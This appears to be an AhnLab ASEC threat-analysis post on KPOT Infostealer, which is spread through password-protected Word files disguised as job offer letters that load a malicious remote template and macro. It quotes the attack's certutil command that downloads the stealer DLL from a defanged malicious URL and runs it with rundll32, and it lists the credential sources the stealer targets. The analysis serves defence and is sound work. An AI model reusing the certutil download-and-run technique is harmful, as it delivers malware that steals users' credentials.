Malware Disguised as Job Offer Letter
The ASEC analysis team has recently discovered that KPOT Infostealer is being distributed via spam mails containing word files. There has been a number of cases ultimately downloading Infostealer programs when the macro was enabled, but this case is noticeable in that it used a word file with a particular password in a spam mail disguised as a job offer letter to trick users.
Figure 1. Operation process of malware
While how the e-mail came to be spread has not yet been identified, it appears that the attacker used a more sophisticated scheme to deceive users, considering the mail contains the content of a job offer letter and the password of the file to make as if the mail was sent to specific people.
- Sender: Team Lead
- E-mail Title: Our Team Job Invitation
- Mail Details: Hello, our invitation is attached to this message. Your personal password: TBBEx○○○○○○○○○○UP3Vm
The file gets decompressed when the password above is entered. Because it uses the normal XML Relationship of OOXML (Office Open XML) format with only the target URL being the malicious type, it is difficult to figure out whether the file is malicious with the file binary alone. Inside the settings.xml.rels file exists an URL that can load an external template that includes a malicious macro and payload (see Figure 3). Opening the word file is enough for the URL to attempt accessing an external malicious URL.
Figure 2. A compressed malicious word file that can be uncompressed with a password. The password is written in the e-mail
Figure 3. Malicious URL inserted in document
Figure 4. Automatically attempting to access malicious URL when word file is opened
The DOTM file contains an obfuscated malicious macro code. When the macro is executed, KPOT Infostealer is downloaded through the Windows normal process certutil.exe. Afterward, the malware with the dll form is run with rundll32.exe.
certutil.exe is a basic program used to manage certificates in Windows. But as it can download certificates or other files and save them as local files in the remote URL with methods such as ‘certutil.exe -urlcache -split -f [URL] [output.file],’ it is sometimes used in distributing malware as in this case.
Upon debugging the obfuscated macro code, the code downloads a dll file in the %TEMP% path from the external URL. The downloaded file is the KPOT malware of the info-stealer type.
certutil.exe -urlcache -split -f hxxps://donattelli[.]com/test/ssi/1.dll C:\Users\[User]\AppData\Local\Temp\rad6FECC.tmp.dll
Figure 5. DOCM download URL found upon debugging macro code & how it is run
Figure 6. certutil.exe and rundll32.exe that can be seen with child process
KPOT Infostealer is malware that steals data from Internet browsers, FTP clients, VPN clients, messengers, and cryptocurrency wallets. Through AhnLab’s analysis infrastructure RAPIT, it has been found that the malware attempts to access config files of WS_FTP, FileZilla, and WinSCP, as well as the account information of the Outlook application.
As shown in Figure 8, the code steals the information of the user PC and that of various applications.
Figure 7. Malicious behaviors of KPOT malware found in AhnLab’s RAPIT
Figure 8. Excerpt of code inside KPOT Info-stealer
As most types of malware are transmitted through spam mails, users should refrain from opening attached files from mails with unknown sources. Of course, even when users receive e-mails from trusted people, they should double-check the e-mail address of the sender and have a habit of not running the mail’s attached file.
Also, users are advised to update the anti-malware engine pattern to its latest version.
AhnLab’s anti-malware product, V3, detects and blocks the malicious files introduced in the post using the aliases below.
[File Detection]
Downloader/DOC.Generic
Downloader/DOC.Agent
Infostealer/Win.KPot.C4565958
Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner below.
